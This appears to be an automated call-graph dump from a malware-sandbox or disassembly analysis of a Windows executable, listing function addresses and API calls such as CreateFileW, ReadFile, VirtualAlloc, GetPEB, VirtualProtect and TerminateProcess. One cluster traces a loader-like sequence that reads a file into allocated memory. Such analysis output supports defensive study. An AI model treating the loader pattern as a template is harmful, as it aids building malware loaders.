___scrt_is_nonwritable_in_current_image 96934->96935 96947 c42f5e EnterCriticalSection 96935->96947 96937 c4807b 96948 c480fb 96937->96948 96941 c480ac __wsopen_s 96941->96928 96942->96922 96943->96931 96944->96931 96945->96931 96946->96931 96947->96937 96955 c4811e 96948->96955 96949 c48088 96961 c480b7 96949->96961 96950 c48177 96966 c44c7d 96950->96966 96955->96949 96955->96950 96964 c3918d EnterCriticalSection 96955->96964 96965 c391a1 LeaveCriticalSection 96955->96965 96956 c48189 96956->96949 96979 c43405 11 API calls 2 library calls 96956->96979 96958 c481a8 96980 c3918d EnterCriticalSection 96958->96980 96984 c42fa6 LeaveCriticalSection 96961->96984 96963 c480be 96963->96941 96964->96955 96965->96955 96967 c44c8a IsInExceptionSpec 96966->96967 96968 c44cca 96967->96968 96969 c44cb5 RtlAllocateHeap 96967->96969 96981 c34ead 7 API calls 2 library calls 96967->96981 96982 c3f2d9 20 API calls _free 96968->96982 96969->96967 96970 c44cc8 96969->96970 96973 c429c8 96970->96973 96974 c429d3 RtlFreeHeap 96973->96974 96978 c429fc _free 96973->96978 96975 c429e8 96974->96975 96974->96978 96983 c3f2d9 20 API calls _free 96975->96983 96977 c429ee GetLastError 96977->96978 96978->96956 96979->96958 96980->96949 96981->96967 96982->96970 96983->96977 96984->96963 96986 c2fddb 22 API calls 96985->96986 96987 c15734 96986->96987 96987->96896 96989 c142bc FindResourceExW 96988->96989 96993 c142d9 96988->96993 96990 c535ba LoadResource 96989->96990 96989->96993 96991 c535cf SizeofResource 96990->96991 96990->96993 96992 c535e3 LockResource 96991->96992 96991->96993 96992->96993 96993->96897 96995 c53d90 96994->96995 96996 c1512e 96994->96996 97000 c3ece3 96996->97000 96999->96902 97003 c3eaaa 97000->97003 97002 c1513c 97002->96897 97004 c3eab6 ___scrt_is_nonwritable_in_current_image 97003->97004 97005 c3eac2 97004->97005 97007 c3eae8 97004->97007 97016 c3f2d9 20 API calls _free 97005->97016 97018 c3918d EnterCriticalSection 97007->97018 97008 c3eac7 97017 c427ec 26 API calls pre_c_initialization 97008->97017 97010 c3eaf4 97019 c3ec0a 62 API calls 2 library calls 97010->97019 97013 c3eb08 97020 c3eb27 LeaveCriticalSection __fread_nolock 97013->97020 97015 c3ead2 __wsopen_s 97015->97002 97016->97008 97017->97015 97018->97010 97019->97013 97020->97015 97024 c3e8e1 97021->97024 97023 c15118 97023->96914 97025 c3e8ed ___scrt_is_nonwritable_in_current_image 97024->97025 97026 c3e900 ___scrt_fastfail 97025->97026 97027 c3e92d 97025->97027 97028 c3e925 __wsopen_s 97025->97028 97037 c3f2d9 20 API calls _free 97026->97037 97039 c3918d EnterCriticalSection 97027->97039 97028->97023 97031 c3e937 97040 c3e6f8 38 API calls 4 library calls 97031->97040 97032 c3e91a 97038 c427ec 26 API calls pre_c_initialization 97032->97038 97034 c3e94e 97041 c3e96c LeaveCriticalSection __fread_nolock 97034->97041 97037->97032 97038->97028 97039->97031 97040->97034 97041->97028 97045 c3e4e8 97042->97045 97044 c8275d 97044->96916 97048 c3e469 97045->97048 97047 c3e505 97047->97044 97049 c3e478 97048->97049 97050 c3e48c 97048->97050 97056 c3f2d9 20 API calls _free 97049->97056 97055 c3e488 __alldvrm 97050->97055 97058 c4333f 11 API calls 2 library calls 97050->97058 97052 c3e47d 97057 c427ec 26 API calls pre_c_initialization 97052->97057 97055->97047 97056->97052 97057->97055 97058->97055 97064 c82e7a 97059->97064 97060 c150f5 40 API calls 97060->97064 97061 c82d3b 97061->96826 97061->96843 97062 c828fe 27 API calls 97062->97064 97063 c1511f 64 API calls 97063->97064 97064->97060 97064->97061 97064->97062 97064->97063 97066 c822e7 97065->97066 97067 c822d9 97065->97067 97069 c8232c 97066->97069 97070 c3e5eb 29 API calls 97066->97070 97093 c822f0 97066->97093 97068 c3e5eb 29 API calls 97067->97068 97068->97066 97094 c82557 40 API calls __fread_nolock 97069->97094 97071 c82311 97070->97071 97071->97069 97073 c8231a 97071->97073 97073->97093 97102 c3e678 97073->97102 97074 c82370 97075 c82374 97074->97075 97076 c82395 97074->97076 97079 c82381 97075->97079 97081 c3e678 67 API calls 97075->97081 97095 c82171 97076->97095 97082 c3e678 67 API calls 97079->97082 97079->97093 97080 c8239d 97083 c823c3 97080->97083 97084 c823a3 97080->97084 97081->97079 97082->97093 97115 c823f3 74 API calls 97083->97115 97086 c823b0 97084->97086 97087 c3e678 67 API calls 97084->97087 97088 c3e678 67 API calls 97086->97088 97086->97093 97087->97086 97088->97093 97089 c823de 97092 c3e678 67 API calls 97089->97092 97089->97093 97090 c823ca 97090->97089 97091 c3e678 67 API calls 97090->97091 97091->97089 97092->97093 97093->96843 97094->97074 97096 c3ea0c ___std_exception_copy 21 API calls 97095->97096 97097 c8217f 97096->97097 97098 c3ea0c ___std_exception_copy 21 API calls 97097->97098 97099 c82190 97098->97099 97100 c3ea0c ___std_exception_copy 21 API calls 97099->97100 97101 c8219c 97100->97101 97101->97080 97103 c3e684 ___scrt_is_nonwritable_in_current_image 97102->97103 97104 c3e695 97103->97104 97105 c3e6aa 97103->97105 97133 c3f2d9 20 API calls _free 97104->97133 97114 c3e6a5 __wsopen_s 97105->97114 97116 c3918d EnterCriticalSection 97105->97116 97107 c3e69a 97134 c427ec 26 API calls pre_c_initialization 97107->97134 97110 c3e6c6 97117 c3e602 97110->97117 97112 c3e6d1 97135 c3e6ee LeaveCriticalSection __fread_nolock 97112->97135 97114->97093 97115->97090 97116->97110 97118 c3e624 97117->97118 97119 c3e60f 97117->97119 97131 c3e61f 97118->97131 97136 c3dc0b 97118->97136 97168 c3f2d9 20 API calls _free 97119->97168 97121 c3e614 97169 c427ec 26 API calls pre_c_initialization 97121->97169 97128 c3e646 97153 c4862f 97128->97153 97131->97112 97132 c429c8 _free 20 API calls 97132->97131 97133->97107 97134->97114 97135->97114 97137 c3dc23 97136->97137 97141 c3dc1f 97136->97141 97138 c3d955 __fread_nolock 26 API calls 97137->97138 97137->97141 97139 c3dc43 97138->97139 97170 c459be 62 API calls 5 library calls 97139->97170 97142 c44d7a 97141->97142 97143 c44d90 97142->97143 97145 c3e640 97142->97145 97144 c429c8 _free 20 API calls 97143->97144 97143->97145 97144->97145 97146 c3d955 97145->97146 97147 c3d961 97146->97147 97148 c3d976 97146->97148 97171 c3f2d9 20 API calls _free 97147->97171 97148->97128 97150 c3d966 97172 c427ec 26 API calls pre_c_initialization 97150->97172 97152 c3d971 97152->97128 97154 c4863e 97153->97154 97156 c48653 97153->97156 97176 c3f2c6 20 API calls _free 97154->97176 97157 c4868e 97156->97157 97162 c4867a 97156->97162 97178 c3f2c6 20 API calls _free 97157->97178 97159 c48643 97177 c3f2d9 20 API calls _free 97159->97177 97160 c48693 97179 c3f2d9 20 API calls _free 97160->97179 97173 c48607 97162->97173 97165 c3e64c 97165->97131 97165->97132 97166 c4869b 97180 c427ec 26 API calls pre_c_initialization 97166->97180 97168->97121 97169->97131 97170->97141 97171->97150 97172->97152 97181 c48585 97173->97181 97175 c4862b 97175->97165 97176->97159 97177->97165 97178->97160 97179->97166 97180->97165 97182 c48591 ___scrt_is_nonwritable_in_current_image 97181->97182 97192 c45147 EnterCriticalSection 97182->97192 97184 c4859f 97185 c485c6 97184->97185 97186 c485d1 97184->97186 97193 c486ae 97185->97193 97208 c3f2d9 20 API calls _free 97186->97208 97189 c485cc 97209 c485fb LeaveCriticalSection __wsopen_s 97189->97209 97191 c485ee __wsopen_s 97191->97175 97192->97184 97210 c453c4 97193->97210 97195 c486c4 97223 c45333 21 API calls 3 library calls 97195->97223 97196 c486be 97196->97195 97198 c453c4 __wsopen_s 26 API calls 97196->97198 97206 c486f6 97196->97206 97201 c486ed 97198->97201 97199 c453c4 __wsopen_s 26 API calls 97202 c48702 CloseHandle 97199->97202 97200 c4871c 97207 c4873e 97200->97207 97224 c3f2a3 20 API calls 2 library calls 97200->97224 97203 c453c4 __wsopen_s 26 API calls 97201->97203 97202->97195 97204 c4870e GetLastError 97202->97204 97203->97206 97204->97195 97206->97195 97206->97199 97207->97189 97208->97189 97209->97191 97211 c453e6 97210->97211 97212 c453d1 97210->97212 97214 c3f2c6 __dosmaperr 20 API calls 97211->97214 97218 c4540b 97211->97218 97213 c3f2c6 __dosmaperr 20 API calls 97212->97213 97215 c453d6 97213->97215 97216 c45416 97214->97216 97217 c3f2d9 _free 20 API calls 97215->97217 97219 c3f2d9 _free 20 API calls 97216->97219 97220 c453de 97217->97220 97218->97196 97221 c4541e 97219->97221 97220->97196 97222 c427ec pre_c_initialization 26 API calls 97221->97222 97222->97220 97223->97200 97224->97207 97225 c1dee5 97228 c1b710 97225->97228 97229 c1b72b 97228->97229 97230 c60146 97229->97230 97231 c600f8 97229->97231 97238 c1b750 97229->97238 97294 c958a2 207 API calls 2 library calls 97230->97294 97234 c60102 97231->97234 97236 c6010f 97231->97236 97231->97238 97292 c95d33 207 API calls 97234->97292 97255 c1ba20 97236->97255 97293 c961d0 207 API calls 2 library calls 97236->97293 97242 c1bbe0 40 API calls 97238->97242 97243 c2d336 40 API calls 97238->97243 97247 c60322 97238->97247 97251 c1ba4e 97238->97251 97238->97255 97257 c1a8c7 22 API calls 97238->97257 97259 c1ec40 97238->97259 97283 c1a81b 41 API calls 97238->97283 97284 c2d2f0 40 API calls 97238->97284 97285 c2a01b 207 API calls 97238->97285 97286 c30242 5 API calls __Init_thread_wait 97238->97286 97287 c2edcd 22 API calls 97238->97287 97288 c300a3 29 API calls __onexit 97238->97288 97289 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97238->97289 97290 c2ee53 82 API calls 97238->97290 97291 c2e5ca 207 API calls 97238->97291 97295 c1aceb 23 API calls messages 97238->97295 97296 c6f6bf 23 API calls 97238->97296 97242->97238 97243->97238 97244 c603d9 97244->97244 97297 c95c0c 82 API calls 97247->97297 97255->97251 97298 c8359c 82 API calls __wsopen_s 97255->97298 97257->97238 97279 c1ec76 messages 97259->97279 97260 c30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97260->97279 97261 c300a3 29 API calls pre_c_initialization 97261->97279 97262 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97262->97279 97264 c2fddb 22 API calls 97264->97279 97265 c1fef7 97272 c1a8c7 22 API calls 97265->97272 97277 c1ed9d messages 97265->97277 97267 c64b0b 97302 c8359c 82 API calls __wsopen_s 97267->97302 97268 c1a8c7 22 API calls 97268->97279 97269 c64600 97273 c1a8c7 22 API calls 97269->97273 97269->97277 97272->97277 97273->97277 97275 c1fbe3 97275->97277 97278 c64bdc 97275->97278 97282 c1f3ae messages 97275->97282 97276 c1a961 22 API calls 97276->97279 97277->97238 97303 c8359c 82 API calls __wsopen_s 97278->97303 97279->97260 97279->97261 97279->97262 97279->97264 97279->97265 97279->97267 97279->97268 97279->97269 97279->97275 97279->97276 97279->97277 97281 c64beb 97279->97281 97279->97282 97299 c201e0 207 API calls 2 library calls 97279->97299 97300 c206a0 41 API calls messages 97279->97300 97304 c8359c 82 API calls __wsopen_s 97281->97304 97282->97277 97301 c8359c 82 API calls __wsopen_s 97282->97301 97283->97238 97284->97238 97285->97238 97286->97238 97287->97238 97288->97238 97289->97238 97290->97238 97291->97238 97292->97236 97293->97255 97294->97238 97295->97238 97296->97238 97297->97255 97298->97244 97299->97279 97300->97279 97301->97277 97302->97277 97303->97281 97304->97277 97305 c11044 97310 c110f3 97305->97310 97307 c1104a 97346 c300a3 29 API calls __onexit 97307->97346 97309 c11054 97347 c11398 97310->97347 97314 c1116a 97315 c1a961 22 API calls 97314->97315 97316 c11174 97315->97316 97317 c1a961 22 API calls 97316->97317 97318 c1117e 97317->97318 97319 c1a961 22 API calls 97318->97319 97320 c11188 97319->97320 97321 c1a961 22 API calls 97320->97321 97322 c111c6 97321->97322 97323 c1a961 22 API calls 97322->97323 97324 c11292 97323->97324 97357 c1171c 97324->97357 97328 c112c4 97329 c1a961 22 API calls 97328->97329 97330 c112ce 97329->97330 97378 c21940 97330->97378 97332 c112f9 97388 c11aab 97332->97388 97334 c11315 97335 c11325 GetStdHandle 97334->97335 97336 c52485 97335->97336 97337 c1137a 97335->97337 97336->97337 97338 c5248e 97336->97338 97340 c11387 OleInitialize 97337->97340 97339 c2fddb 22 API calls 97338->97339 97341 c52495 97339->97341 97340->97307 97395 c8011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97341->97395 97343 c5249e 97396 c80944 CreateThread 97343->97396 97345 c524aa CloseHandle 97345->97337 97346->97309 97397 c113f1 97347->97397 97350 c113f1 22 API calls 97351 c113d0 97350->97351 97352 c1a961 22 API calls 97351->97352 97353 c113dc 97352->97353 97354 c16b57 22 API calls 97353->97354 97355 c11129 97354->97355 97356 c11bc3 6 API calls 97355->97356 97356->97314 97358 c1a961 22 API calls 97357->97358 97359 c1172c 97358->97359 97360 c1a961 22 API calls 97359->97360 97361 c11734 97360->97361 97362 c1a961 22 API calls 97361->97362 97363 c1174f 97362->97363 97364 c2fddb 22 API calls 97363->97364 97365 c1129c 97364->97365 97366 c11b4a 97365->97366 97367 c11b58 97366->97367 97368 c1a961 22 API calls 97367->97368 97369 c11b63 97368->97369 97370 c1a961 22 API calls 97369->97370 97371 c11b6e 97370->97371 97372 c1a961 22 API calls 97371->97372 97373 c11b79 97372->97373 97374 c1a961 22 API calls 97373->97374 97375 c11b84 97374->97375 97376 c2fddb 22 API calls 97375->97376 97377 c11b96 RegisterWindowMessageW 97376->97377 97377->97328 97379 c21981 97378->97379 97380 c2195d 97378->97380 97404 c30242 5 API calls __Init_thread_wait 97379->97404 97387 c2196e 97380->97387 97406 c30242 5 API calls __Init_thread_wait 97380->97406 97382 c2198b 97382->97380 97405 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97382->97405 97384 c28727 97384->97387 97407 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97384->97407 97387->97332 97389 c5272d 97388->97389 97390 c11abb 97388->97390 97408 c83209 23 API calls 97389->97408 97391 c2fddb 22 API calls 97390->97391 97394 c11ac3 97391->97394 97393 c52738 97394->97334 97395->97343 97396->97345 97409 c8092a 28 API calls 97396->97409 97398 c1a961 22 API calls 97397->97398 97399 c113fc 97398->97399 97400 c1a961 22 API calls 97399->97400 97401 c11404 97400->97401 97402 c1a961 22 API calls 97401->97402 97403 c113c6 97402->97403 97403->97350 97404->97382 97405->97380 97406->97384 97407->97387 97408->97393 97410 14e226b 97413 14e1ee0 97410->97413 97412 14e22b7 97426 14df910 97413->97426 97415 14e1f7f 97418 14e1fd9 VirtualAlloc 97415->97418 97421 14e1fbd 97415->97421 97424 14e20e0 CloseHandle 97415->97424 97425 14e20f0 VirtualFree 97415->97425 97429 14e2df0 GetPEB 97415->97429 97417 14e1fb0 CreateFileW 97417->97415 97417->97421 97419 14e1ffa ReadFile 97418->97419 97418->97421 97420 14e2018 VirtualAlloc 97419->97420 97419->97421 97420->97415 97420->97421 97422 14e21cc VirtualFree 97421->97422 97423 14e21da 97421->97423 97422->97423 97423->97412 97424->97415 97425->97415 97431 14e2d90 GetPEB 97426->97431 97428 14dff9b 97428->97415 97430 14e2e1a 97429->97430 97430->97417 97432 14e2dba 97431->97432 97432->97428 97433 c62a00 97434 c1d7b0 messages 97433->97434 97435 c1db11 PeekMessageW 97434->97435 97436 c1d807 GetInputState 97434->97436 97437 c1d9d5 97434->97437 97438 c61cbe TranslateAcceleratorW 97434->97438 97440 c1db8f PeekMessageW 97434->97440 97441 c1da04 timeGetTime 97434->97441 97442 c1db73 TranslateMessage DispatchMessageW 97434->97442 97443 c1dbaf Sleep 97434->97443 97444 c62b74 Sleep 97434->97444 97446 c61dda timeGetTime 97434->97446 97460 c1ec40 207 API calls 97434->97460 97465 c1dd50 97434->97465 97472 c1dfd0 97434->97472 97495 c21310 97434->97495 97551 c1bf40 207 API calls 2 library calls 97434->97551 97552 c2edf6 IsDialogMessageW GetClassLongW 97434->97552 97554 c83a2a 23 API calls 97434->97554 97555 c8359c 82 API calls __wsopen_s 97434->97555 97435->97434 97436->97434 97436->97435 97438->97434 97440->97434 97441->97434 97442->97440 97461 c1dbc0 97443->97461 97444->97461 97445 c2e551 timeGetTime 97445->97461 97553 c2e300 23 API calls 97446->97553 97449 c62c0b GetExitCodeProcess 97452 c62c37 CloseHandle 97449->97452 97453 c62c21 WaitForSingleObject 97449->97453 97450 ca29bf GetForegroundWindow 97450->97461 97452->97461 97453->97434 97453->97452 97454 c62a31 97454->97437 97455 c62ca9 Sleep 97455->97434 97460->97434 97461->97434 97461->97437 97461->97445 97461->97449 97461->97450 97461->97454 97461->97455 97556 c95658 23 API calls 97461->97556 97557 c7e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97461->97557 97558 c7d4dc 47 API calls 97461->97558 97466 c1dd83 97465->97466 97467 c1dd6f 97465->97467 97560 c8359c 82 API calls __wsopen_s 97466->97560 97559 c1d260 207 API calls 2 library calls 97467->97559 97470 c1dd7a 97470->97434 97471 c62f75 97471->97471 97474 c1e010 97472->97474 97473 c1ec40 207 API calls 97488 c1e0dc messages 97473->97488 97474->97488 97563 c30242 5 API calls __Init_thread_wait 97474->97563 97477 c62fca 97479 c1a961 22 API calls 97477->97479 97477->97488 97478 c1a961 22 API calls 97478->97488 97480 c62fe4 97479->97480 97564 c300a3 29 API calls __onexit 97480->97564 97485 c62fee 97565 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97485->97565 97488->97473 97488->97478 97489 c1a8c7 22 API calls 97488->97489 97490 c8359c 82 API calls 97488->97490 97491 c1e3e1 97488->97491 97492 c204f0 22 API calls 97488->97492 97561 c1a81b 41 API calls 97488->97561 97562 c2a308 207 API calls 97488->97562 97566 c30242 5 API calls __Init_thread_wait 97488->97566 97567 c300a3 29 API calls __onexit 97488->97567 97568 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97488->97568 97569 c947d4 207 API calls 97488->97569 97570 c968c1 207 API calls 97488->97570 97489->97488 97490->97488 97491->97434 97492->97488 97496 c217b0 97495->97496 97497 c21376 97495->97497 97728 c30242 5 API calls __Init_thread_wait 97496->97728 97498 c21390 97497->97498 97499 c66331 97497->97499 97501 c21940 9 API calls 97498->97501 97502 c6633d 97499->97502 97687 c9709c 97499->97687 97505 c213a0 97501->97505 97502->97434 97504 c217ba 97506 c217fb 97504->97506 97507 c19cb3 22 API calls 97504->97507 97508 c21940 9 API calls 97505->97508 97510 c66346 97506->97510 97512 c2182c 97506->97512 97515 c217d4 97507->97515 97509 c213b6 97508->97509 97509->97506 97511 c213ec 97509->97511 97733 c8359c 82 API calls __wsopen_s 97510->97733 97511->97510 97517 c21408 __fread_nolock 97511->97517 97730 c1aceb 23 API calls messages 97512->97730 97729 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97515->97729 97516 c21839 97731 c2d217 207 API calls 97516->97731 97517->97516 97520 c6636e 97517->97520 97528 c2fddb 22 API calls 97517->97528 97529 c2fe0b 22 API calls 97517->97529 97534 c1ec40 207 API calls 97517->97534 97536 c2152f 97517->97536 97537 c663b2 97517->97537 97541 c215c7 messages 97517->97541 97734 c8359c 82 API calls __wsopen_s 97520->97734 97522 c663d1 97736 c95745 54 API calls _wcslen 97522->97736 97523 c2153c 97526 c21940 9 API calls 97523->97526 97524 c21872 97732 c2faeb 23 API calls 97524->97732 97527 c21549 97526->97527 97532 c21940 9 API calls 97527->97532 97527->97541 97528->97517 97529->97517 97531 c2171d 97531->97434 97535 c21563 97532->97535 97534->97517 97535->97541 97543 c1a8c7 22 API calls 97535->97543 97536->97522 97536->97523 97735 c8359c 82 API calls __wsopen_s 97537->97735 97538 c21940 9 API calls 97538->97541 97541->97524 97541->97538 97542 c2167b messages 97541->97542 97571 c9958b 97541->97571 97574 c883da 97541->97574 97577 c16246 97541->97577 97581 c16216 97541->97581 97586 c9e204 97541->97586 97622 c8744a 97541->97622 97678 c8f0ec 97541->97678 97737 c8359c 82 API calls __wsopen_s 97541->97737 97542->97531 97727 c2ce17 22 API calls messages 97542->97727 97543->97541 97551->97434 97552->97434 97553->97434 97554->97434 97555->97434 97556->97461 97557->97461 97558->97461 97559->97470 97560->97471 97561->97488 97562->97488 97563->97477 97564->97485 97565->97488 97566->97488 97567->97488 97568->97488 97569->97488 97570->97488 97738 c97f59 97571->97738 97573 c9959b 97573->97541 97858 c898e3 97574->97858 97576 c883ea 97576->97541 97578 c16250 97577->97578 97579 c1625f 97577->97579 97578->97541 97579->97578 97580 c16264 CloseHandle 97579->97580 97580->97578 97582 c16246 CloseHandle 97581->97582 97583 c1621e 97582->97583 97584 c16246 CloseHandle 97583->97584 97585 c1622d messages 97584->97585 97585->97541 97587 c1a961 22 API calls 97586->97587 97588 c9e21b 97587->97588 97589 c17510 53 API calls 97588->97589 97590 c9e22a 97589->97590 97591 c16270 22 API calls 97590->97591 97592 c9e23d 97591->97592 97593 c17510 53 API calls 97592->97593 97594 c9e24a 97593->97594 97595 c9e262 97594->97595 97596 c9e2c7 97594->97596 97952 c1b567 39 API calls 97595->97952 97598 c17510 53 API calls 97596->97598 97600 c9e2cc 97598->97600 97599 c9e267 97601 c9e2d9 97599->97601 97604 c9e280 97599->97604 97600->97601 97602 c9e314 97600->97602 97955 c19c6e 22 API calls 97601->97955 97605 c9e32c 97602->97605 97956 c1b567 39 API calls 97602->97956 97953 c16d25 22 API calls __fread_nolock 97604->97953 97608 c9e345 97605->97608 97957 c1b567 39 API calls 97605->97957 97609 c1a8c7 22 API calls 97608->97609 97612 c9e35f 97609->97612 97610 c9e28d 97613 c16350 22 API calls 97610->97613 97933 c792c8 97612->97933 97615 c9e29b 97613->97615 97954 c16d25 22 API calls __fread_nolock 97615->97954 97617 c9e2b4 97618 c16350 22 API calls 97617->97618 97621 c9e2c2 97618->97621 97619 c9e2e6 97619->97541 97958 c162b5 22 API calls 97621->97958 97623 c87469 97622->97623 97624 c87474 97622->97624 97962 c1b567 39 API calls 97623->97962 97627 c1a961 22 API calls 97624->97627 97662 c87554 97624->97662 97626 c2fddb 22 API calls 97628 c87587 97626->97628 97629 c87495 97627->97629 97630 c2fe0b 22 API calls 97628->97630 97631 c1a961 22 API calls 97629->97631 97632 c87598 97630->97632 97633 c8749e 97631->97633 97634 c16246 CloseHandle 97632->97634 97635 c17510 53 API calls 97633->97635 97636 c875a3 97634->97636 97637 c874aa 97635->97637 97638 c1a961 22 API calls 97636->97638 97963 c1525f 22 API calls 97637->97963 97640 c875ab 97638->97640 97642 c16246 CloseHandle 97640->97642 97641 c874bf 97643 c16350 22 API calls 97641->97643 97644 c875b2 97642->97644 97645 c874f2 97643->97645 97646 c17510 53 API calls 97644->97646 97648 c8754a 97645->97648 97964 c7d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97645->97964 97647 c875be 97646->97647 97649 c16246 CloseHandle 97647->97649 97966 c1b567 39 API calls 97648->97966 97651 c875c8 97649->97651 97655 c15745 5 API calls 97651->97655 97653 c87502 97653->97648 97654 c87506 97653->97654 97656 c19cb3 22 API calls 97654->97656 97658 c875e2 97655->97658 97657 c87513 97656->97657 97965 c7d2c1 26 API calls 97657->97965 97660 c875ea 97658->97660 97661 c876de GetLastError 97658->97661 97967 c153de 27 API calls messages 97660->97967 97663 c876f7 97661->97663 97662->97626 97676 c876a4 97662->97676 97665 c16216 CloseHandle 97663->97665 97665->97676 97666 c8751c 97666->97648 97667 c875f8 97968 c153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97667->97968 97669 c87645 97671 c2fddb 22 API calls 97669->97671 97670 c875ff 97670->97669 97673 c7ccff 4 API calls 97670->97673 97672 c87679 97671->97672 97674 c1a961 22 API calls 97672->97674 97673->97669 97675 c87686 97674->97675 97675->97676 97969 c7417d 22 API calls __fread_nolock 97675->97969 97676->97541 97679 c17510 53 API calls 97678->97679 97680 c8f126 97679->97680 97970 c19e90 97680->97970 97682 c8f136 97683 c8f15b 97682->97683 97684 c1ec40 207 API calls 97682->97684 97686 c8f15f 97683->97686 97998 c19c6e 22 API calls 97683->97998 97684->97683 97686->97541 97688 c970db 97687->97688 97689 c970f5 97687->97689 98017 c8359c 82 API calls __wsopen_s 97688->98017 98006 c95689 97689->98006 97693 c1ec40 206 API calls 97694 c97164 97693->97694 97695 c971ff 97694->97695 97698 c970ed 97694->97698 97700 c971a6 97694->97700 97696 c97253 97695->97696 97697 c97205 97695->97697 97696->97698 97699 c17510 53 API calls 97696->97699 98018 c81119 22 API calls 97697->98018 97698->97502 97701 c97265 97699->97701 97705 c80acc 22 API calls 97700->97705 97703 c1aec9 22 API calls 97701->97703 97707 c97289 CharUpperBuffW 97703->97707 97704 c97228 98019 c1a673 22 API calls 97704->98019 97706 c971de 97705->97706 97709 c21310 206 API calls 97706->97709 97710 c972a3 97707->97710 97709->97698 97711 c972aa 97710->97711 97712 c972f6 97710->97712 98013 c80acc 97711->98013 97714 c17510 53 API calls 97712->97714 97713 c97230 98020 c1bf40 207 API calls 2 library calls 97713->98020 97716 c972fe 97714->97716 98021 c2e300 23 API calls 97716->98021 97720 c21310 206 API calls 97720->97698 97721 c97308 97721->97698 97722 c17510 53 API calls 97721->97722 97723 c97323 97722->97723 98022 c1a673 22 API calls 97723->98022 97725 c97333 98023 c1bf40 207 API calls 2 library calls 97725->98023 97727->97542 97728->97504 97729->97506 97730->97516 97731->97524 97732->97524 97733->97541 97734->97541 97735->97541 97736->97535 97737->97541 97776 c17510 97738->97776 97742 c98281 97743 c9844f 97742->97743 97748 c9828f 97742->97748 97840 c98ee4 60 API calls 97743->97840 97746 c9845e 97747 c9846a 97746->97747 97746->97748 97762 c97fd5 messages 97747->97762 97812 c97e86 97748->97812 97749 c17510 53 API calls 97766 c98049 97749->97766 97754 c982c8 97827 c2fc70 97754->97827 97757 c982e8 97833 c8359c 82 API calls __wsopen_s 97757->97833 97758 c98302 97834 c163eb 22 API calls 97758->97834 97761 c98311 97835 c16a50 22 API calls 97761->97835 97762->97573 97763 c982f3 GetCurrentProcess TerminateProcess 97763->97758 97765 c9832a 97774 c98352 97765->97774 97836 c204f0 22 API calls 97765->97836 97766->97742 97766->97749 97766->97762 97831 c7417d 22 API calls __fread_nolock 97766->97831 97832 c9851d 42 API calls _strftime 97766->97832 97768 c984c5 97768->97762 97770 c984d9 FreeLibrary 97768->97770 97769 c98341 97837 c98b7b 75 API calls 97769->97837 97770->97762 97774->97768 97838 c204f0 22 API calls 97774->97838 97839 c1aceb 23 API calls messages 97774->97839 97841 c98b7b 75 API calls 97774->97841 97777 c17525 97776->97777 97794 c17522 97776->97794 97778 c1755b 97777->97778 97779 c1752d 97777->97779 97781 c1756d 97778->97781 97786 c5500f 97778->97786 97789 c550f6 97778->97789 97842 c351c6 26 API calls 97779->97842 97843 c2fb21 51 API calls 97781->97843 97784 c5510e 97784->97784 97785 c1753d 97788 c2fddb 22 API calls 97785->97788 97792 c55088 97786->97792 97793 c2fe0b 22 API calls 97786->97793 97790 c17547 97788->97790 97845 c35183 26 API calls 97789->97845 97791 c19cb3 22 API calls 97790->97791 97791->97794 97844 c2fb21 51 API calls 97792->97844 97796 c55058 97793->97796 97794->97762 97799 c98cd3 97794->97799 97795 c2fddb 22 API calls 97797 c5507f 97795->97797 97796->97795 97798 c19cb3 22 API calls 97797->97798 97798->97792 97800 c1aec9 22 API calls 97799->97800 97801 c98cee CharLowerBuffW 97800->97801 97846 c78e54 97801->97846 97805 c1a961 22 API calls 97806 c98d2a 97805->97806 97853 c16d25 22 API calls __fread_nolock 97806->97853 97808 c98d3e 97809 c193b2 22 API calls 97808->97809 97811 c98d48 _wcslen 97809->97811 97810 c98e5e _wcslen 97810->97766 97811->97810 97854 c9851d 42 API calls _strftime 97811->97854 97813 c97eec 97812->97813 97814 c97ea1 97812->97814 97818 c99096 97813->97818 97815 c2fe0b 22 API calls 97814->97815 97816 c97ec3 97815->97816 97816->97813 97817 c2fddb 22 API calls 97816->97817 97817->97816 97819 c992ab messages 97818->97819 97826 c990ba _strcat _wcslen 97818->97826 97819->97754 97820 c1b567 39 API calls 97820->97826 97821 c1b38f 39 API calls 97821->97826 97822 c1b6b5 39 API calls 97822->97826 97823 c17510 53 API calls 97823->97826 97824 c3ea0c 21 API calls ___std_exception_copy 97824->97826 97826->97819 97826->97820 97826->97821 97826->97822 97826->97823 97826->97824 97857 c7efae 24 API calls _wcslen 97826->97857 97829 c2fc85 97827->97829 97828 c2fd1d VirtualProtect 97830 c2fceb 97828->97830 97829->97828 97829->97830 97830->97757 97830->97758 97831->97766 97832->97766 97833->97763 97834->97761 97835->97765 97836->97769 97837->97774 97838->97774 97839->97774 97840->97746 97841->97774 97842->97785 97843->97785 97844->97789 97845->97784 97847 c78e74 _wcslen 97846->97847 97848 c78f63 97847->97848 97851 c78ea9 97847->97851 97852 c78f68 97847->97852 97848->97805 97848->97811 97851->97848 97855 c2ce60 41 API calls 97851->97855 97852->97848 97856 c2ce60 41 API calls 97852->97856 97853->97808 97854->97810 97855->97851 97856->97852 97857->97826 97859 c899e8 97858->97859 97860 c89902 97858->97860 97927 c89caa 39 API calls 97859->97927 97862 c2fddb 22 API calls 97860->97862 97863 c89909 97862->97863 97865 c2fe0b 22 API calls 97863->97865 97864 c899ca 97864->97576 97866 c8991a 97865->97866 97868 c16246 CloseHandle 97866->97868 97867 c89ac5 97909 c81e96 97867->97909 97870 c89925 97868->97870 97871 c1a961 22 API calls 97870->97871 97874 c8992d 97871->97874 97872 c89acc 97913 c7ccff 97872->97913 97873 c899a2 97873->97864 